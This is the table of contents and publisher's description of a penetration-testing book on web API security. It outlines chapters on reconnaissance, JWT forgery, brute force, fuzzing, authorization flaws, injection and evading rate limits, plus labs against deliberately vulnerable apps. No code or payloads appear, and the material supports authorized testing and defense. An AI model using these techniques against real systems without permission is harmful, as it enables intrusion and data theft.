Hacking APIs: Breaking Web Application Programming Interfaces

About the Author....8

About the Technical Reviewer....8

Foreword....19

Acknowledgments....23

Introduction....25

The Allure of Hacking Web APIs....26

This Book’s Approach....26

Hacking the API Restaurant....27

Part I: How Web API Security Works....29

0: Preparing for Your Security Tests....31

Receiving Authorization....32

Threat Modeling an API Test....32

Which API Features You Should Test....34

API Authenticated Testing....34

Web Application Firewalls....35

Mobile Application Testing....35

Auditing API Documentation....36

Rate Limit Testing....36

Restrictions and Exclusions....37

Security Testing Cloud APIs....38

DoS Testing....38

Reporting and Remediation Testing....39

A Note on Bug Bounty Scope....39

Summary....41

1: How Web Applications Work....43

Web App Basics....43

The URL....44

HTTP Requests....45

HTTP Responses....46

HTTP Status Codes....47

HTTP Methods....48

Stateful and Stateless HTTP....50

Web Server Databases....51

SQL....51

NoSQL....52

How APIs Fit into the Picture....53

Summary....54

2: The Anatomy of Web APIs....55

How Web APIs Work....56

Standard Web API Types....58

RESTful APIs....58

GraphQL....62

REST API Specifications....66

API Data Interchange Formats....67

JSON....67

XML....69

YAML....70

API Authentication....70

Basic Authentication....71

API Keys....72

JSON Web Tokens....73

HMAC....74

OAuth 2.0....75

No Authentication....76

APIs in Action: Exploring Twitter’s API....76

Summary....79

3: Common API Vulnerabilities....81

Information Disclosure....82

Broken Object Level Authorization....83

Broken User Authentication....84

Excessive Data Exposure....86

Lack of Resources and Rate Limiting....87

Broken Function Level Authorization....87

Mass Assignment....89

Security Misconfigurations....90

Injections....92

Improper Assets Management....93

Business Logic Vulnerabilities....94

Summary....95

Part II: Building an API Testing Lab....97

4: Your API Hacking System....99

Kali Linux....100

Analyzing Web Apps with DevTools....100

Capturing and Modifying Requests with Burp Suite....103

Setting Up FoxyProxy....104

Adding the Burp Suite Certificate....104

Navigating Burp Suite....105

Intercepting Traffic....107

Altering Requests with Intruder....109

Crafting API Requests in Postman, an API Browser....112

The Request Builder....114

Environments....117

Collections....118

The Collection Runner....121

Code Snippets....122

The Tests Panel....122

Configuring Postman to Work with Burp Suite....123

Supplemental Tools....124

Performing Reconnaissance with OWASP Amass....125

Discovering API Endpoints with Kiterunner....126

Scanning for Vulnerabilities with Nikto....127

Scanning for Vulnerabilities with OWASP ZAP....128

Fuzzing with Wfuzz....128

Discovering HTTP Parameters with Arjun....130

Summary....131

Lab #1: Enumerating the User Accounts in a REST API....131

5: Setting Up Vulnerable API Targets....137

Creating a Linux Host....138

Installing Docker and Docker Compose....138

Installing Vulnerable Applications....139

The completely ridiculous API (crAPI)....139

OWASP DevSlop’s Pixi....140

OWASP Juice Shop....140

Damn Vulnerable GraphQL Application....141

Adding Other Vulnerable Apps....142

Hacking APIs on TryHackMe and HackTheBox....143

Summary....144

Lab #2: Finding Your Vulnerable APIs....144

Part III: Attacking APIs....149

6: Discovery....151

Passive Recon....152

The Passive Recon Process....152

Google Hacking....153

ProgrammableWeb’s API Search Directory....155

Shodan....157

OWASP Amass....159

Exposed Information on GitHub....161

Active Recon....164

The Active Recon Process....164

Baseline Scanning with Nmap....166

Finding Hidden Paths in Robots.txt....167

Finding Sensitive Information with Chrome DevTools....167

Validating APIs with Burp Suite....170

Crawling URIs with OWASP ZAP....171

Brute-Forcing URIs with Gobuster....173

Discovering API Content with Kiterunner....174

Summary....176

Lab #3: Performing Active Recon for a Black Box Test....176

7: Endpoint Analysis....183

Finding Request Information....184

Finding Information in Documentation....184

Importing API Specifications....187

Reverse Engineering APIs....189

Adding API Authentication Requirements to Postman....192

Analyzing Functionality....194

Testing Intended Use....195

Performing Privileged Actions....196

Analyzing API Responses....197

Finding Information Disclosures....197

Finding Security Misconfigurations....198

Verbose Errors....198

Poor Transit Encryption....199

Problematic Configurations....199

Finding Excessive Data Exposures....200

Finding Business Logic Flaws....201

Summary....202

Lab #4: Building a crAPI Collection and Discovering Excessive Data Exposure....202

8: Attacking Authentication....207

Classic Authentication Attacks....208

Password Brute-Force Attacks....208

Password Reset and Multifactor Authentication Brute-Force Attacks....209

Password Spraying....211

Including Base64 Authentication in Brute-Force Attacks....213

Forging Tokens....215

Manual Load Analysis....215

Live Token Capture Analysis....217

Brute-Forcing Predictable Tokens....218

JSON Web Token Abuse....220

Recognizing and Analyzing JWTs....221

The None Attack....223

The Algorithm Switch Attack....223

The JWT Crack Attack....224

Summary....225

Lab #5: Cracking a crAPI JWT Signature....225

9: Fuzzing....229

Effective Fuzzing....230

Choosing Fuzzing Payloads ....231

Detecting Anomalies....232

Fuzzing Wide and Deep....235

Fuzzing Wide with Postman....235

Fuzzing Deep with Burp Suite....238

Fuzzing Deep with Wfuzz....240

Fuzzing Wide for Improper Assets Management....242

Testing Request Methods with Wfuzz....244

Fuzzing “Deeper” to Bypass Input Sanitization....245

Fuzzing for Directory Traversal....246

Summary....246

Lab #6: Fuzzing for Improper Assets Management Vulnerabilities....247

10: Exploiting Authorization....251

Finding BOLAs....251

Locating Resource IDs....252

A-B Testing for BOLA....253

Side-Channel BOLA....254

Finding BFLAs....255

A-B-A Testing for BFLA....255

Testing for BFLA in Postman....256

Authorization Hacking Tips....258

Postman’s Collection Variables....258

Burp Suite Match and Replace....259

Summary....259

Lab #7: Finding Another User’s Vehicle Location....260

11: Mass Assignment....265

Finding Mass Assignment Targets....266

Account Registration....266

Unauthorized Access to Organizations....266

Finding Mass Assignment Variables....267

Finding Variables in Documentation....267

Fuzzing Unknown Variables....268

Blind Mass Assignment Attacks....269

Automating Mass Assignment Attacks with Arjun and Burp Suite Intruder....269

Combining BFLA and Mass Assignment....270

Summary....271

Lab #8: Changing the Price of Items in an Online Store....271

12: Injection....277

Discovering Injection Vulnerabilities....278

Cross-Site Scripting (XSS)....279

Cross-API Scripting (XAS)....280

SQL Injection....281

Manually Submitting Metacharacters....283

SQLmap....284

NoSQL Injection....285

Operating System Command Injection....287

Summary....289

Lab #9: Faking Coupons Using NoSQL Injection....289

Part IV: Real-World API Hacking....293

13: Applying Evasive Techniques and Rate Limit Testing....295

Evading API Security Controls....295

How Security Controls Work....296

API Security Control Detection....297

Using Burner Accounts....298

Evasive Techniques....298

Automating Evasion with Burp Suite....301

Automating Evasion with Wfuzz....302

Testing Rate Limits....304

A Note on Lax Rate Limits....304

Path Bypass....306

Origin Header Spoofing....307

Rotating IP Addresses in Burp Suite....308

Summary....312

14: Attacking GraphQL....313

GraphQL Requests and IDEs....314

Active Reconnaissance....315

Scanning....315

Viewing DVGA in a Browser....316

Using DevTools....317

Reverse Engineering the GraphQL API....318

Directory Brute-Forcing for the GraphQL Endpoint....318

Cookie Tampering to Enable the GraphiQL IDE....320

Reverse Engineering the GraphQL Requests....322

Reverse Engineering a GraphQL Collection Using Introspection....324

GraphQL API Analysis....325

Crafting Requests Using the GraphiQL Documentation Explorer....325

Using the InQL Burp Extension....326

Fuzzing for Command Injection....329

Summary....333

15: Data Breaches and Bug Bounties....335

The Breaches....336

Peloton....336

USPS Informed Visibility API....337

T-Mobile API Breach....339

The Bounties....340

The Price of Good API Keys....340

Private API Authorization Issues....341

Starbucks: The Breach That Never Was....343

An Instagram GraphQL BOLA....345

Summary....346

Conclusion....347

A: API Hacking Checklist....349

B: Additional Resources....351

Chapter 0: Preparing for Your Security Tests....351

Chapter 1: How Web Applications Work....351

Chapter 2: The Anatomy of Web APIs....352

Chapter 3: Common API Vulnerabilities ....352

Chapter 4: Your API Hacking System....352

Chapter 5: Setting Up Vulnerable API Targets....352

Chapter 6: Discovery....353

Chapter 7: Endpoint Analysis....353

Chapter 8: Attacking Authentication....353

Chapter 9: Fuzzing....353

Chapter 10: Exploiting Authorization....353

Chapter 11: Mass Assignment....354

Chapter 12: Injection....354

Chapter 13: Applying Evasive Techniques and Rate Limit Testing....354

Chapter 14: Attacking GraphQL....354

Chapter 15: Data Breaches and Bug Bounties....354

Index....355

Hacking APIs is a crash course in web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.

Hacking APIs is a crash course on web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.

You’ll learn how REST and GraphQL APIs work in the wild and set up a streamlined API testing lab with Burp Suite and Postman. Then you’ll master tools useful for reconnaissance, endpoint analysis, and fuzzing, such as Kiterunner and OWASP Amass. Next, you’ll learn to perform common attacks, like those targeting an API’s authentication mechanisms and the injection vulnerabilities commonly found in web applications. You’ll also learn techniques for bypassing protections against these attacks.

In the book’s nine guided labs, which target intentionally vulnerable APIs, you’ll practice:

• Enumerating APIs users and endpoints using fuzzing techniques
• Using Postman to discover an excessive data exposure vulnerability
• Performing a JSON Web Token attack against an API authentication process
• Combining multiple API attack techniques to perform a NoSQL injection
• Attacking a GraphQL API to uncover a broken object level authorization vulnerability

By the end of the book, you’ll be prepared to uncover those high-payout API bugs other hackers aren’t finding and improve the security of applications on the web.